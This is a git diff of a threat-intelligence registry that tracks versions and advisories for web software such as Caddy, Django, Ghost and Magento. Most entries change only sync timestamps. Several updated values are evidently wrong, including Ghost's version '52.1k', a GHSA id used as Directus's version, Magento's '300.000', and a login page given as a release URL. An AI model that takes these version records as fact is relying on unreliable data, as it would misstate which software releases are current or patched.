"trigger_vector": "\u5bf9 `proxy-boundary` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
@@ -195,7 +201,7 @@
"source_kinds": [
"osv-batch"
],
"candidate_count": 1,
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",

2
08-threat-intel/registry/entities/adminer.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/adobe-commerce.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/angular--package--angular-core.json
查看文件

@@ -23,7 +23,7 @@
],
"version_sync_status": "green",
"security_version_count": 18,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/angular/angular/security/advisories/GHSA-prjf-86w9-mfqv",

2
08-threat-intel/registry/entities/angular.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 18,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/apache-httpd.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 1,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [
"Apache HTTPD Security"
],

2
08-threat-intel/registry/entities/apache-tomcat.json
查看文件

@@ -23,7 +23,7 @@
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [
"Apache Tomcat Security"
],

2
08-threat-intel/registry/entities/aspnet-core.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/astro--module--astro.json
查看文件

@@ -23,7 +23,7 @@
],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/withastro/astro/security/advisories/GHSA-wrwg-2hg8-v723",

2
08-threat-intel/registry/entities/astro--project--astro.json
查看文件

@@ -31,7 +31,7 @@
],
"version_sync_status": "green",
"security_version_count": 26,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/withastro/astro/security/advisories/GHSA-c4pw-33h3-35xw",

2
08-threat-intel/registry/entities/astro.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 30,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

11
08-threat-intel/registry/entities/caddy--extension--github-com-caddyserver-caddy-v2.json
查看文件

@@ -12,20 +12,21 @@
"repo_url": "https://github.com/caddyserver/caddy",
"package_registry": "",
"marketplace_url": "",
"latest_version": "2.11.2",
"latest_version": "2.11.1",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_release_url": "https://github.com/caddyserver/caddy/releases/tag/v2.11.2",
"latest_release_at": "2026-02-27T19:55:10Z",
"latest_release_url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-5r3v-vc8m-m96g",
"version_source_refs": [
"https://github.com/caddyserver/caddy/releases/tag/v2.11.2",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-5r3v-vc8m-m96g"
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:55+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-5r3v-vc8m-m96g"
"https://github.com/caddyserver/caddy/security/advisories/GHSA-5r3v-vc8m-m96g",
"advisory-fixed-version"
],
"catalog_source": "",
"catalog_reason": "",

9
08-threat-intel/registry/entities/caddy--repo--github-com-caddyserver-caddy-v2.json
查看文件

@@ -14,8 +14,8 @@
"marketplace_url": "",
"latest_version": "2.11.2",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_release_url": "https://github.com/caddyserver/caddy/releases/tag/v2.11.2",
"latest_release_at": "2026-03-23T04:52:47.652974Z",
"latest_release_url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-7r4p-vjf4-gxv4",
"version_source_refs": [
"https://github.com/caddyserver/caddy/releases/tag/v2.11.2",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-4xrr-hq4w-6vf4",
@@ -24,12 +24,13 @@
],
"version_sync_status": "green",
"security_version_count": 5,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:56+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-4xrr-hq4w-6vf4",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-m2w3-8f23-hxxf",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-7r4p-vjf4-gxv4"
"https://github.com/caddyserver/caddy/security/advisories/GHSA-7r4p-vjf4-gxv4",
"advisory-fixed-version"
],
"catalog_source": "",
"catalog_reason": "",

8
08-threat-intel/registry/entities/caddy.json
查看文件

@@ -12,14 +12,14 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "2.11.2",
"latest_version": "2.11.1",
"version_scheme": "vendor",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_release_url": "https://github.com/caddyserver/caddy/releases/tag/v2.11.2",
"latest_release_at": "2026-02-27T19:55:10Z",
"latest_release_url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-5r3v-vc8m-m96g",
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 7,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

6
08-threat-intel/registry/entities/directus--repo--directus-directus.json
查看文件

@@ -12,17 +12,17 @@
"repo_url": "https://github.com/directus/directus",
"package_registry": "",
"marketplace_url": "",
"latest_version": "11.16.1",
"latest_version": "3573-4c68-g8cc",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-10T22:20:52Z",
"latest_release_url": "https://github.com/directus/directus/releases/tag/v11.16.1",
"latest_release_url": "https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc",
"version_source_refs": [
"https://github.com/directus/directus/releases/tag/v11.16.1",
"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc"
],
"version_sync_status": "green",
"security_version_count": 1,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"Directus GitHub Advisories"

6
08-threat-intel/registry/entities/directus.json
查看文件

@@ -12,16 +12,16 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "11.16.1",
"latest_version": "3573-4c68-g8cc",
"version_scheme": "vendor",
"latest_release_at": "2026-03-10T22:20:52Z",
"latest_release_url": "https://github.com/directus/directus/releases/tag/v11.16.1",
"latest_release_url": "https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc",
"version_source_refs": [
"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc"
],
"version_sync_status": "green",
"security_version_count": 1,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:56+00:00",
"latest_version_evidence": [
"Directus GitHub Advisories"
],

2
08-threat-intel/registry/entities/discourse.json
查看文件

@@ -31,7 +31,7 @@
],
"version_sync_status": "green",
"security_version_count": 78,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"Discourse Release Notes RSS",
"Discourse Security RSS"

2
08-threat-intel/registry/entities/django--project--django.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 160,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"npm latest",
"https://nvd.nist.gov/vuln/detail/CVE-2019-11358"

2
08-threat-intel/registry/entities/django.json
查看文件

@@ -38,7 +38,7 @@
],
"version_sync_status": "green",
"security_version_count": 160,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"Django Security Weblog",
"Django Security Releases Archive"

2
08-threat-intel/registry/entities/drupal.json
查看文件

@@ -27,7 +27,7 @@
],
"version_sync_status": "green",
"security_version_count": 74,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"Drupal Security Advisories RSS"
],

11
08-threat-intel/registry/entities/echo--repo--github-com-labstack-echo-v4.json
查看文件

@@ -12,10 +12,10 @@
"repo_url": "https://github.com/labstack/echo",
"package_registry": "",
"marketplace_url": "",
"latest_version": "5.0.4",
"latest_version": "4.9.0",
"version_scheme": "semver-ish",
"latest_release_at": "2026-02-15T15:55:53Z",
"latest_release_url": "https://github.com/labstack/echo/releases/tag/v5.0.4",
"latest_release_at": "2024-05-20T16:03:47Z",
"latest_release_url": "https://github.com/labstack/echo/issues/2259",
"version_source_refs": [
"https://github.com/labstack/echo/releases/tag/v5.0.4",
"https://github.com/labstack/echo/pull/1718",
@@ -23,11 +23,12 @@
],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"https://github.com/labstack/echo/pull/1718",
"https://github.com/labstack/echo/issues/2259"
"https://github.com/labstack/echo/issues/2259",
"advisory-fixed-version"
],
"catalog_source": "",
"catalog_reason": "",

8
08-threat-intel/registry/entities/echo.json
查看文件

@@ -12,14 +12,14 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "5.0.4",
"latest_version": "4.9.0",
"version_scheme": "vendor",
"latest_release_at": "2026-02-15T15:55:53Z",
"latest_release_url": "https://github.com/labstack/echo/releases/tag/v5.0.4",
"latest_release_at": "2024-05-20T16:03:47Z",
"latest_release_url": "https://github.com/labstack/echo/issues/2259",
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/esbuild--project--esbuild.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99"

2
08-threat-intel/registry/entities/esbuild.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/express.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

4
08-threat-intel/registry/entities/fastify--project--fastify.json
查看文件

@@ -12,7 +12,7 @@
"repo_url": "",
"package_registry": "https://www.npmjs.com/package/fastify",
"marketplace_url": "",
"latest_version": "5.8.2",
"latest_version": "5.8.4",
"version_scheme": "semver-ish",
"latest_release_at": "",
"latest_release_url": "https://www.npmjs.com/package/fastify",
@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/fastify/fastify/security/advisories/GHSA-573f-x89g-hqp9"

4
08-threat-intel/registry/entities/fastify.json
查看文件

@@ -12,14 +12,14 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "5.8.2",
"latest_version": "5.8.4",
"version_scheme": "vendor",
"latest_release_at": "",
"latest_release_url": "https://www.npmjs.com/package/fastify",
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/flask--project--flask.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 22,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/pallets/flask/security/advisories/GHSA-68rp-wp8r-4726"

2
08-threat-intel/registry/entities/flask.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 22,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

12
08-threat-intel/registry/entities/ghost--repo--tryghost-ghost.json
查看文件

@@ -12,18 +12,20 @@
"repo_url": "https://github.com/TryGhost/Ghost",
"package_registry": "",
"marketplace_url": "",
"latest_version": "6.22.1",
"latest_version": "52.1k",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-20T15:25:05Z",
"latest_release_url": "https://github.com/TryGhost/Ghost/releases/tag/v6.22.1",
"latest_release_url": "https://github.com/login?return_to=%2FTryGhost%2FGhost",
"version_source_refs": [
"https://github.com/TryGhost/Ghost/releases/tag/v6.22.1"
"https://github.com/TryGhost/Ghost/releases/tag/v6.22.1",
"https://github.com/login?return_to=%2FTryGhost%2FGhost"
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:58+00:00",
"latest_version_evidence": [
"GitHub Releases API"
"GitHub Releases API",
"Ghost GitHub Advisories"
],
"catalog_source": "Ghost GitHub Advisories",
"catalog_reason": "source catalog exposed a stable security-related object and auto-catalog is enabled",

6
08-threat-intel/registry/entities/ghost.json
查看文件

@@ -12,16 +12,16 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "6.22.1",
"latest_version": "52.1k",
"version_scheme": "vendor",
"latest_release_at": "2026-03-20T15:25:05Z",
"latest_release_url": "https://github.com/TryGhost/Ghost/releases/tag/v6.22.1",
"latest_release_url": "https://github.com/login?return_to=%2FTryGhost%2FGhost",
"version_source_refs": [
"https://github.com/login?return_to=%2FTryGhost%2FGhost"
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"Ghost GitHub Advisories"
],

11
08-threat-intel/registry/entities/gin--repo--github-com-gin-gonic-gin.json
查看文件

@@ -12,20 +12,21 @@
"repo_url": "https://github.com/gin-gonic/gin",
"package_registry": "",
"marketplace_url": "",
"latest_version": "1.12.0",
"latest_version": "1.7.7",
"version_scheme": "semver-ish",
"latest_release_at": "2026-02-28T10:12:25Z",
"latest_release_url": "https://github.com/gin-gonic/gin/releases/tag/v1.12.0",
"latest_release_at": "2026-03-14T10:41:18.820930Z",
"latest_release_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28483",
"version_source_refs": [
"https://github.com/gin-gonic/gin/releases/tag/v1.12.0",
"https://nvd.nist.gov/vuln/detail/CVE-2020-28483"
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"https://nvd.nist.gov/vuln/detail/CVE-2020-28483"
"https://nvd.nist.gov/vuln/detail/CVE-2020-28483",
"advisory-fixed-version"
],
"catalog_source": "",
"catalog_reason": "",

8
08-threat-intel/registry/entities/gin.json
查看文件

@@ -12,14 +12,14 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "1.12.0",
"latest_version": "1.7.7",
"version_scheme": "vendor",
"latest_release_at": "2026-02-28T10:12:25Z",
"latest_release_url": "https://github.com/gin-gonic/gin/releases/tag/v1.12.0",
"latest_release_at": "2026-03-14T10:41:18.820930Z",
"latest_release_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28483",
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:58+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/gitea.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/gitlab-ce.json
查看文件

@@ -21,7 +21,7 @@
],
"version_sync_status": "green",
"security_version_count": 614,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"GitLab Security Releases Atom"
],

2
08-threat-intel/registry/entities/grafana.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/hapi--package--hapi-hapi.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"npm latest",
"https://www.npmjs.com/advisories/1482"

2
08-threat-intel/registry/entities/hapi.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

14
08-threat-intel/registry/entities/haproxy.json
查看文件

@@ -17,11 +17,12 @@
"latest_release_at": "Mon, 16 Mar 2026 08:00:00 +0000",
"latest_release_url": "https://www.haproxy.com/blog/announcing-haproxy-fusion-2-0",
"version_source_refs": [
"https://www.haproxy.com/blog/announcing-haproxy-fusion-2-0"
"https://www.haproxy.com/blog/announcing-haproxy-fusion-2-0",
"https://www.haproxy.com/blog/announcing-haproxy-unified-gateway-1-0"
],
"version_sync_status": "green",
"security_version_count": 1,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"security_version_count": 2,
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"HAProxy Blog Feed"
],
@@ -33,17 +34,18 @@
"history_backfill_status": "seeded",
"latest_sync_status": "green",
"official_source_covered": true,
"advisory_count": 6,
"workflow_complete_advisory_count": 6,
"advisory_count": 7,
"workflow_complete_advisory_count": 7,
"version_mapped_advisory_count": 0,
"first_advisory_at": "2026-02-19T09:00:00+00:00",
"latest_advisory_at": "2026-03-16T08:00:00+00:00",
"latest_advisory_at": "2026-03-24T00:00:00+00:00",
"advisory_ids": [
"haproxy--0b253e2576",
"haproxy--10754c864c",
"haproxy--3164dd5e31",
"haproxy--9149e77a37",
"haproxy--c60ee42162",
"haproxy--ecfe8a1346",
"haproxy--f1c3251635"
],
"source_refs": [

2
08-threat-intel/registry/entities/jenkins.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/joomla.json
查看文件

@@ -25,7 +25,7 @@
],
"version_sync_status": "green",
"security_version_count": 5,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"Joomla Security Centre"
],

2
08-threat-intel/registry/entities/kibana.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/koa--project--koa.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm"

2
08-threat-intel/registry/entities/koa.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/laravel--package--laravel-framework.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 103,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"Packagist p2",
"https://github.com/laravel/framework/security/advisories/GHSA-66hf-2p6w-jqfw"

2
08-threat-intel/registry/entities/laravel.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 103,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

9
08-threat-intel/registry/entities/magento-open-source--repo--magento-magento2.json
查看文件

@@ -12,19 +12,20 @@
"repo_url": "https://github.com/magento/magento2",
"package_registry": "",
"marketplace_url": "",
"latest_version": "2.4.9-beta1",
"latest_version": "300.000",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-10T14:04:22Z",
"latest_release_url": "https://github.com/magento/magento2/releases/tag/2.4.9-beta1",
"latest_release_url": "https://sansec.io/research/visbot-malware-on-6691-stores-analysis",
"version_source_refs": [
"https://github.com/magento/magento2/releases/tag/2.4.9-beta1",
"https://sansec.io/research/vendors-defeat-magento-security-patch-simple-check",
"https://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability",
"https://sansec.io/research/magento-apsb25-08"
"https://sansec.io/research/magento-apsb25-08",
"https://sansec.io/research/visbot-malware-on-6691-stores-analysis"
],
"version_sync_status": "green",
"security_version_count": 3,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"Sansec Research"

某些文件未显示,因为此 diff 中更改的文件太多 显示更多